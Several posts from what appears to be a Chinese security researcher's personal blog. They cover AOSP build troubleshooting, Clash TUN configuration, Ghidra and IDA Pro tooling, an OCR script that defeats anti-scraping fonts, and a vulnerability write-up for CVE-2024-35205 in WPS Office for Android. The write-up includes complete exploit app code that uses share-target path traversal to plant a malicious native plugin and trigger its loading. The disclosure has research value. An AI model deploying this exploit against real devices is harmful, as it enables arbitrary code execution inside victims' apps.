out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/debug/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/graphics/pixelformat.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/graphics/point.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/graphics/rect.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/hardware/biometrics/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/hardware/sensor/assist/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/internal/locallog.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/internal/powerprofile.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/internal/processstats.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/media/audioattributes.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/net/network.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/net/networkcapabilities.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/net/networkrequest.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/backtrace.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/batterystats.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/batterytype.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/bundle.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/cpufreq.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/cpuinfo.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/data.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/header.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/incident.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/kernelwake.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/looper.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/message.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/messagequeue.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/metadata.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/pagetypeinfo.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/patternmatcher.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/persistablebundle.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/powermanager.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/procrank.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/ps.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/statsdata.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/system_properties.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/os/worksource.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/providers/settings.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/providers/settings/common.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/providers/settings/global.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/providers/settings/secure.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/providers/settings/system.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/activitymanagerservice.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/alarmmanagerservice.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/animationadapter.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/appwindowthumbnail.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/backup_chunks_metadata.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/face.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/fingerprint.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/forceappstandbytracker.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/intentresolver.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/jobscheduler.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/powermanagerservice.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/rolemanagerservice.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/statlogger.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/surfaceanimator.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/usagestatsservice.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/windowmanagerservice.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/windowmanagertrace.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/wirelesschargerdetector.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/connectivity/data_stall_event.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/job/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/server/location/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/adb.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/appwidget.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/battery.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/batterystats.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/diskstats.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/graphicsstats.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/netstats.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/network_watchlist.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/notification.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/package.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/print.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/procstats.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/procstats_enum.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/restricted_image.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/runtime.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/service/usb.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/connectivity/network_stack.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/devicepolicy/device_policy.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/devicepolicy/device_policy_enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/dnsresolver/dns_resolver.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/docsui/docsui_enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/intelligence/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/launcher/launcher.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/location/location_enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/mediametrics/mediametrics.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/storage/storage_enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/stats/style/style_enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/telecomm/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/telephony/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/util/common.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/util/event_log_tags.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/util/log.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/view/display.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/view/displaycutout.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/view/displayinfo.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/view/enums.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/view/remote_animation_target.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/view/surface.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/view/surfacecontrol.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/view/windowlayoutparams.srcjar out/soong/.intermediates/frameworks/base/framework-javastream-protos/gen/frameworks/base/core/proto/android/wifi/enums.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/apex/apexd/sysprop/ApexProperties.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/libsysprop/srcs/android/sysprop/AdbProperties.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/libsysprop/srcs/android/sysprop/CarProperties.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/libsysprop/srcs/android/sysprop/ContactsProperties.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/libsysprop/srcs/android/sysprop/CryptoProperties.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/libsysprop/srcs/android/sysprop/DisplayProperties.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/libsysprop/srcs/android/sysprop/SetupWizardProperties.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/libsysprop/srcs/android/sysprop/TraceProperties.srcjar out/soong/.intermediates/frameworks/base/framework/android_common/gen/sysprop/system/libsysprop/srcs/android/sysprop/VoldProperties.srcjar out/soong/.intermediates/frameworks/base/core/res/framework-res/android_common/gen/R.jar && prebuilts/jdk/jdk9/linux-x86/bin/java -jar out/soong/host/linux-x86/framework/metalava.jar -encoding UTF-8 -source 1.8 @out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/check_last_released_api.timestamp.rsp @out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/last-apicheck/srcjars/list -bootclasspath out/soong/.intermediates/libcore/mmodules/core_platform_api/core.platform.api.stubs/android_common/javac/core.platform.api.stubs.jar:out/soong/.intermediates/libcore/core-lambda-stubs/android_common/javac/core-lambda-stubs.jar -classpath out/soong/.intermediates/frameworks/base/ext/android_common/turbine-combined/ext.jar:out/soong/.intermediates/frameworks/base/framework/android_common/turbine-jarjar/framework.jar:out/soong/.intermediates/frameworks/base/media/updatable_media_stubs/android_common/turbine-combined/updatable_media_stubs.jar:out/soong/.intermediates/frameworks/base/ext/android_common/turbine-combined/ext.jar:out/soong/.intermediates/frameworks/base/framework/android_common/turbine-jarjar/framework.jar:out/soong/.intermediates/frameworks/opt/net/voip/voip-common/android_common/turbine-combined/voip-common.jar -sourcepath "frameworks/base/core/java:frameworks/base/graphics/java:frameworks/base/location/java:frameworks/base/media/java:frameworks/base/media/mca/effect/java:frameworks/base/media/mca/filterfw/java:frameworks/base/media/mca/filterpacks/java:frameworks/base/drm/java:frameworks/base/opengl/java:frameworks/base/sax/java:frameworks/base/telecomm/java:frameworks/base/telephony/java:frameworks/base/wifi/java:frameworks/base/lowpan/java:frameworks/base/keystore/java:frameworks/base/rs/java" --no-banner --color --quiet --format=v2  --manifest frameworks/base/core/res/AndroidManifest.xml --hide-package com.android.okhttp --hide-package com.android.org.conscrypt --hide-package com.android.server --error UnhiddenSystemApi --hide RequiresPermission --hide MissingPermission --hide BroadcastBehavior --hide HiddenSuperclass --hide DeprecationMismatch --hide UnavailableSymbol --hide SdkConstant --hide HiddenTypeParameter --hide Todo --hide Typo --check-compatibility:api:released out/soong/.intermediates/prebuilts/sdk/last-released-public-api/gen/last-released-api.txt --check-compatibility:removed:released frameworks/base/api/removed.txt --merge-qualifier-annotations tools/metalava/manual --merge-qualifier-annotations libcore/ojluni/annotations/sdk  && touch out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/check_last_released_api.timestamp && rm -rf "out/soong/.intermediates/frameworks/base/api-stubs-docs/android_common/last-apicheck/srcjars") || ( echo -e "\n******************************\nYou have tried to change the API from what has been previously released in\nan SDK.  Please fix the errors listed above.\n******************************\n" ; exit 38 )
Killed
-e 
******************************
You have tried to change the API from what has been previously released in
an SDK.  Please fix the errors listed above.
******************************

17:27:08 ninja failed with: exit status 1

虽然但是，这俩报错随便 update api 一下就可以编译过了。但是但是但是，它刷进去就一直重启，adbd 都没起来，也看不到日志，试了很多次，甚至重新拉了源码，还是一样的效果。都快怀疑人生了，我就搜啊搜啊搜啊搜，终于这个世界上不止我一个倒霉蛋：

编译 aosp 并且刷入 pixel 后无限重启，各位有什么排查问题妙招https://www.v2ex.com/t/893452

❓Docker + Ubuntu 18.04

不理解，但是实在是没活了。抱着试试看的心态，准备起个 docker 编译一手。

首先是 Dockerfile 如下：

FROM ubuntu:18.04
RUN apt-get update && apt-get install -y python3 git-core gnupg flex bison rsync build-essential zip curl zlib1g-dev libc6-dev-i386 x11proto-core-dev libx11-dev lib32z1-dev libgl1-mesa-dev libxml2-utils xsltproc unzip fontconfig
RUN groupadd -g 1000 s1nk && useradd -u 1000 -g 1000 -m -s /bin/bash s1nk

构建镜像，创建容器并启动

docker build -t aosp-builder:18.04 .
docker run -it --rm -u 1000:1000 -v /home/s1nk/mnt_d/aosp_10:/home/aosp aosp-builder:18.04 /bin/bash

-u 1000:1000 设置uid和gid，是为了确保容器内用户与主机用户权限一致，因为我主机拉源码用的用户就是 s1nk(1000)。

然后继续，三板斧

source build/envsetup.sh

lunch aosp_sailfish-userdebug

make -j$(nproc)

没有报错！退出docker回到主机设置一下 ANDROID_PRODUCT_OUT 环境变量，刷入即可。

export ANDROID_PRODUCT_OUT=/home/s1nk/mnt_d/aosp_10/out/target/product/sailfish/

fastboot flashall -w

成功开机，有点说法的。不过我还是不理解… 有懂的哥们可以浇浇我🥺

记一次艰难的 Clash Verge rev TUN 模式断网问题解决

s1nk — Thu, 20 Feb 2025 16:00:00 GMT

这是个悲伤且说来话长的故事，2024的12月16日那时的我正在强网杯S8赛场上，莫名其妙发现我的 Clash verge rev TUN 模式用不了，在我盲目的重启了n次之后，问题好像解决了，我就没太在意继续完成比赛。在这之后我的 Clash TUN 模式就一直处于间歇性可用持续性用不了的状态。

为了解决这个问题，我查看 mihomo (即内核)的日志，日志到处都是 ⇒ dns resolve failed: couldn't find ip ,于是我搜索相关 issues 但是这些 issues 显然和我的的问题无关，我的问题是开了 TUN 模式之后直接断网，而且我并没有找到别的类似的情况，一直尝试各种方法解决DNS 问题，均无果（因为 DNS 没问题）。

https://github.com/clash-verge-rev/clash-verge-rev/issues/882

https://github.com/clash-verge-rev/clash-verge-rev/issues/467

直到今天，我对终端上的网速再次忍无可忍，再次打开日志界面，打开 tun 模式，映入眼帘的是

default interface changed by monitor,  => utun7

utun7 什么东西，不应该是 en0 吗？然后我才恍然大悟，为什么我的 DNS 一堆错，没网 DNS 坤吧。

tun:
auto-detect-interface: false

也就是

然后再在全局拓展配置里设置

interface-name: en0

Ghidra JNI.h 导入

s1nk — Tue, 18 Feb 2025 16:00:00 GMT

笔者环境：MacOS(arm64) / Ghidra 11.3 / NDK 21.4.7075529

File → Parse C Source 然后新建一个空的 Profile 随便个名字并清空一下，然后在 Source files to Parse 里加入 NDK 里的 jni.h

/toolchains/llvm/prebuilt/darwin-x86_64/sysroot/usr/include/jni.h

直接 Parse to Program cdefs.h 会报错，看起来是这里的 __SIZE_TYPE__ 宏没定义

在 Parse Options 里添加即可

-D__SIZE_TYPE__="size_t"

最终效果如下图：

IDA Pro 9.0 ARM64 调试 WZR 寄存器崩溃问题

s1nk — Wed, 25 Dec 2024 16:00:00 GMT

问题描述

IDA Pro 9.0 （截止至2024年12月26日最新版本，SP1）在调试 ARM64 程序时，鼠标点击或者悬浮在 WZR 寄存器上，如图所示弹框。点击 OK 或 关闭 均导致 IDA Pro 卡死。

问题分析

Mac 上 IDA 的 arm.dylib inline 有点严重不太好看，这里以 Windows 的为例报错的地方代码如下，确实是没有针对 WZR 寄存器 160 的处理逻辑，导致会弹出这个框。

调试发现点击这个框的 OK，如果再次进入这个弹框的逻辑，就会导致IDA卡死；反之如果OK后没有再次走到这个弹框的逻辑，就没事。所以，应该是UI框架的问题？直接把这个框的显示调用全都NOP 掉就好了。

附上 SP1 版本 ARM IDA Pro 的 Patch 脚本

import re

def main():
    with open('/Users/gaoyucan/Documents/CTF/arm.dylib', 'rb') as fp:
        content = fp.read()
        pattern = re.compile(b'\x00\xD4\x3C\x91....')
        content = pattern.sub(b'\x00\xD4\x3C\x91\x1F\x20\x03\xD5', content)
    with open('/Users/gaoyucan/Documents/CTF/arm_patched.dylib', 'wb') as fp:
        fp.write(content)

if __name__ == '__main__':
    main()

idalib C++ CMake 项目配置

s1nk — Wed, 11 Dec 2024 16:00:00 GMT

IDA Pro 9.0 引入了 idalib 强化了 IDA Headless ，可以使用 C++ 和 Python 操作 IDA 自动化对二进制程序进行静态分析，刚好最近项目有批量处理文件的需求，而且 BinaryNinja 试了一下来体验非常差劲，刚好体验一手。

官方SDK中提供的例子是基于Makefile的，但是我是 Jetbrains 家的🐶，我必须用 CLion 下面是一个 CMakeLists.txt 的例子。

cmake_minimum_required(VERSION 3.29)
project(idalib_test)

set(CMAKE_CXX_STANDARD 20)
set(CMAKE_CXX_STANDARD_REQUIRED True)

set(IDASDK "/Users/gaoyucan/Documents/idapro/idasdk90")
set(IDADIR "/Applications/IDA Professional 9.0.app/Contents/MacOS")

set(IDALIBLIB ${IDADIR}/libidalib.dylib)
set(IDALIB ${IDADIR}/libida.dylib)
set(IDAPROINCLUDE ${IDASDK}/include)

add_executable(idalib_test main.cpp)
target_link_libraries(idalib_test PRIVATE ${IDALIBLIB} ${IDALIB})
target_include_directories(idalib_test PRIVATE ${IDAPROINCLUDE})
target_compile_definitions(idalib_test PRIVATE __MAC__=1 __ARM__=1 __EA64__=1)

字体反爬对抗

s1nk — Thu, 31 Oct 2024 16:00:00 GMT

界面上显示明明是这个，复制下来却是 “微北班略声讲哪取，随土便常师想纪撰还，提述融售母酒纪个？” 简单分析后发现这些文字都使用了特殊的反爬字体，其实就是经过了置换处理。

对于这种字体反爬场景可以，使用通过 OCR 识别拉表对抗，下面是通过 paddle 的 OCR 模型的一种实现。

import json
import os.path

from fontTools.ttLib import TTFont
from PIL import Image, ImageDraw, ImageFont
from paddleocr import PaddleOCR

def get_character_image(unicode_char, size=120, color=(0, 0, 0), background=(255, 255, 255)) -> Image:
    # 使用 Pillow 创建图像
    img = Image.new('RGB', (size, size), background)
    draw = ImageDraw.Draw(img)

    # 加载字体
    font = ImageFont.truetype('exam_font_75f40cd3f2514aae89c62ff49d571f02.ttf', 100)

    # 获取文本的宽度和高度
    _, _, text_width, text_height = font.getbbox(unicode_char)

    # 在图像中央绘制文本
    x = (size - text_width) / 2
    y = (size - text_height) / 2
    draw.text((x, y), unicode_char, font=font, fill=color, stroke_width=1.0)

    return img

def main():
    exam_font = TTFont('./exam_font_75f40cd3f2514aae89c62ff49d571f02.ttf')
    ocr = PaddleOCR(lang='ch')
    rec_result = dict()
    for table in exam_font['cmap'].tables:
        if table.isUnicode():
            for k in table.cmap.keys():
                if chr(k) in rec_result:
                    continue
                img_path = f'./images/{k}.png'
                if not os.path.exists(img_path):
                    get_character_image(chr(k)).save(img_path)
                text, _  = ocr.ocr(img_path, det=False, cls=False)[0][0]
                print(f'{img_path}: {chr(k)} -> {text}')
                rec_result[chr(k)] = text
    with open('rec_result.json', 'w') as f:
        rec_map_json = json.dumps(rec_result)
        f.write(rec_map_json)

if __name__ == '__main__':
    main()

CVE-2024-35205 WPS Office 海外版任意代码执行漏洞

s1nk — Mon, 07 Oct 2024 16:00:00 GMT

WPS Office 国际版存在 DirtyStream 漏洞，如下图所示，可以将错误的文件内容或者文件参数传递给Share Target App，以使得Share Target App错误的处理接收到的信息，实现一系列攻击。

首先分析 WPS Office 国际版 AndroidManifest.xml 文件，cn.wps.upload_activity 作为一个ShareTarget 用于处理分享者提供的内容。

在处理 content 类型的文件时，通过 query 查询获取 display_name，未对 displayName 进行过滤，存在目录穿越漏洞，可以向 WPS 私有目录中写入文件

至此实现了对 WPS 私有目录的写入，但是这是一个任意代码执行漏洞，这个考虑存在热更新或者插件化功能，通过写入恶意插件文件实现任意任意代码执行，搜索 System.load 函数的使用，发现此处可以利用，这是一处 OCR功能，可以通过启动 MultipleImageToTextActivity 这个类，传入任意图片触发加载。

因此，利用过程如下：

启动 MultipleImageToTextActivity 创建插件目录
目录穿越写入恶意插件文件
再次启动 MultipleImageToTextActivity 触发恶意插件文件加载

效果如下：

附上完整代码：

// MainActivity

package com.s1nk.myapplication;

import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.widget.Button;

import androidx.activity.EdgeToEdge;
import androidx.appcompat.app.AppCompatActivity;
import androidx.core.graphics.Insets;
import androidx.core.view.ViewCompat;
import androidx.core.view.WindowInsetsCompat;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.util.ArrayList;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        EdgeToEdge.enable(this);
        setContentView(R.layout.activity_main);
        ViewCompat.setOnApplyWindowInsetsListener(findViewById(R.id.main), (v, insets) -> {
            Insets systemBars = insets.getInsets(WindowInsetsCompat.Type.systemBars());
            v.setPadding(systemBars.left, systemBars.top, systemBars.right, systemBars.bottom);
            return insets;
        });
        // 释放文件
        extractEvilFile();

        Button btnCreateOCRPluginDir = findViewById(R.id.btn_create_ocr_plugin_dir);
        btnCreateOCRPluginDir.setOnClickListener(v -> {
            createOcrPluginDir();
        });

        Button btnWriteEvilFile = findViewById(R.id.btn_write_evil_file);
        btnWriteEvilFile.setOnClickListener(v -> {
            // /data/user/0/cn.wps.moffice_eng/
            writeEvilFile("/data/user/0/com.s1nk.myapplication/files/mp50.db", "/data/user/0/cn.wps.moffice_eng/files/ocr_plugin/db/mp50.db");
            writeEvilFile("/data/user/0/com.s1nk.myapplication/files/hw_eng20.db", "/data/user/0/cn.wps.moffice_eng/files/ocr_plugin/db/hw_eng20.db");
            writeEvilFile("/data/user/0/com.s1nk.myapplication/files/libhw_instanttrans.so", "/data/user/0/cn.wps.moffice_eng/files/ocr_plugin/armeabi/libhw_instanttrans.so");
        });

    }

    private void extractEvilFile() {
        moveAssetToDir(this, "mp50.db");
        moveAssetToDir(this, "hw_eng20.db");
        moveAssetToDir(this, "libhw_instanttrans.so");

    }

    private void copyFile(InputStream in, OutputStream out) throws IOException {
        byte[] buffer = new byte[1024];
        int read;
        while ((read = in.read(buffer)) != -1) {
            out.write(buffer, 0, read);
        }
    }

    public void moveAssetToDir(Context context, String filename) {
        OutputStream out = null;
        try (InputStream in = context.getAssets().open(filename)) {
            File outFile = new File(context.getFilesDir(), filename);
            out = new FileOutputStream(outFile);
            copyFile(in, out);
        } catch (IOException ignored) {

        } finally {
            if (out != null) {
                try {
                    out.close();
                } catch (IOException ignored) {}
            }
        }
    }

    private void writeEvilFile(String srcPath, String destPath) {
        Intent intent = new Intent(Intent.ACTION_SEND);
        intent.setComponent(new ComponentName("cn.wps.moffice_eng", "cn.wps.upload_activity"));
        intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
        Uri uri = Uri.parse("content://com.s1nk.myapplication.provider/" + srcPath + "?display_name=../../../../../../../../../.." + destPath);
        intent.setDataAndType(uri, "application/pdf");
        startActivity(intent);
    }

    private void createOcrPluginDir() {
        ArrayList imagePathArr = new ArrayList<>();
        imagePathArr.add("/storage/emulated/0/DCIM/Camera/PXL_20240903_033847893.jpg");
        Intent intent = new Intent();
        intent.setComponent(new ComponentName("cn.wps.moffice_eng", "cn.wps.moffice.main.scan.ui.MultipleImageToTextActivity"));
        intent.putExtra("cn.wps.moffice_extra_image_paths", imagePathArr);
        startActivity(intent);
    }

}

// S1nkContentProvider
package com.s1nk.myapplication;

import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.MatrixCursor;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import android.util.Log;

import androidx.annotation.NonNull;
import androidx.annotation.Nullable;

import java.io.File;
import java.io.FileNotFoundException;

public class S1nkContentProvider extends ContentProvider {
    @Override
    public boolean onCreate() {
        return false;
    }

    @Nullable
    @Override
    public ParcelFileDescriptor openFile(@NonNull Uri uri, @NonNull String mode) throws FileNotFoundException {
        String path = uri.getPath();
        Log.e("s1nk", "openFile: " + path);
        if (path != null) {
            File file = new File(path);
            if (file.exists()) {
                return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_ONLY);
            }
        }
        return super.openFile(uri, mode);
    }

    @Nullable
    @Override
    public Cursor query(@NonNull Uri uri, @Nullable String[] projection, @Nullable String selection, @Nullable String[] selectionArgs, @Nullable String sortOrder) {
        MatrixCursor cursor = new MatrixCursor(new String[]{"_display_name"});
        Log.e("s1nk", "query: " + uri.toString());
        String displayName = uri.getQueryParameter("display_name");
        cursor.addRow(new Object[]{displayName});
        return cursor;
    }

    @Nullable
    @Override
    public String getType(@NonNull Uri uri) {
        throw new UnsupportedOperationException("Not implemented");
    }

    @Nullable
    @Override
    public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
        throw new UnsupportedOperationException("Not implemented");
    }

    @Override
    public int delete(@NonNull Uri uri, @Nullable String selection, @Nullable String[] selectionArgs) {
        throw new UnsupportedOperationException("Not implemented");
    }

    @Override
    public int update(@NonNull Uri uri, @Nullable ContentValues values, @Nullable String selection, @Nullable String[] selectionArgs) {
        throw new UnsupportedOperationException("Not implemented");
    }
}

恶意 SO 文件，这里就简单的打印了一行日志：

#include 
#include 

JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM *vm, void *reserved) {
    JNIEnv *env;
    if (vm->GetEnv(reinterpret_cast<void **>(&env), JNI_VERSION_1_6) != JNI_OK) {
        return -1;
    }
